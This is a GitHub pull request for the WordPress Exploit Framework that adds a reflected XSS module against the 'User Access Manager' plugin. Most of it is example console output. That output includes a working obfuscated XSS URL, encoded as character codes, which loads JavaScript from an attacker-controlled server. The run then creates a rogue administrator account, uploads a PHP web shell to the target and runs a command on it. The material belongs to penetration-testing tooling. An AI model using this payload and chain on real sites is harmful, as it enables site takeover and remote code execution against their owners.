search

rastating / wordpress-exploit-framework

A Ruby framework designed to aid in the penetration testing of WordPress systems.
https://rastating.github.io/wordpress-exploit-framework
GNU General Public License v3.0
1.02k stars 265 forks source link

Add "User access manager" reflected XSS module #38

Closed phyushin closed 7 years ago

phyushin commented 7 years ago

This module exploits the "user-access-manager" module WordPress Plugin

Fixed in: 2.0.0

References:

http://www.defensecode.com/advisories/DC-2017-01-021_WordPress_User_Access_Manager_Plugin_Advisory.pdf

http://seclists.org/bugtraq/2017/May/31

WPVDBID:8814

Disclosure: 2017-05-11

Example output:

wpxf > use exploit/user_access_manager_reflected_xss_shell_upload 

  [+] Loaded module: #<Wpxf::Exploit::UserAccessManagerReflectedXssShellUpload:0x00000001b19008>

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set host 192.168.0.47

  [+] Set host => 192.168.0.47

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set http_server_bind_port 8080

  [+] Set http_server_bind_port => 8080

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set xss_host 192.168.0.220

  [+] Set xss_host => 192.168.0.220

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set payload exec 
  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x00000001af1058>

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set cmd whoami

  [+] Set cmd => whoami

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > check

  [!] Target appears to be vulnerable

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.47/wp-admin/admin.php?page=uam_usergroup&action=editGroup&id=%5C%22%3E%3Cscript%3Eeval%28String.fromCharCode%28101%2C118%2C97%2C108%2C40%2C100%2C101%2C99%2C111%2C100%2C101%2C85%2C82%2C73%2C67%2C111%2C109%2C112%2C111%2C110%2C101%2C110%2C116%2C40%2C47%2C118%2C97%2C114%2C37%2C50%2C48%2C97%2C37%2C50%2C48%2C37%2C51%2C68%2C37%2C50%2C48%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C99%2C114%2C105%2C112%2C116%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C97%2C46%2C115%2C101%2C116%2C65%2C116%2C116%2C114%2C105%2C98%2C117%2C116%2C101%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C114%2C99%2C37%2C50%2C50%2C37%2C50%2C67%2C37%2C50%2C48%2C37%2C50%2C50%2C104%2C116%2C116%2C112%2C37%2C51%2C65%2C37%2C50%2C70%2C37%2C50%2C70%2C49%2C57%2C50%2C46%2C49%2C54%2C56%2C46%2C48%2C46%2C50%2C50%2C48%2C37%2C51%2C65%2C56%2C48%2C56%2C48%2C37%2C50%2C70%2C109%2C86%2C65%2C69%2C116%2C121%2C103%2C114%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C104%2C101%2C97%2C100%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C37%2C50%2C56%2C97%2C37%2C50%2C57%2C37%2C51%2C66%2C47%2C46%2C115%2C111%2C117%2C114%2C99%2C101%2C41%2C41%29%29%3C%2Fscript%3E

  [-] Started HTTP server on 0.0.0.0:8080
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, sDoLTH:JbEcHpWrex
  [-] HTTP server stopped
  [-] Authenticating with WordPress using sDoLTH:JbEcHpWrex...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.47/wp-content/plugins/IdfccoQgun/WCWyiebhMp.php...
  [+] Result: www-data
  [+] Execution finished successfully

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] >
rastating commented 7 years ago

Tested successfully and merged, thank you :1st_place_medal: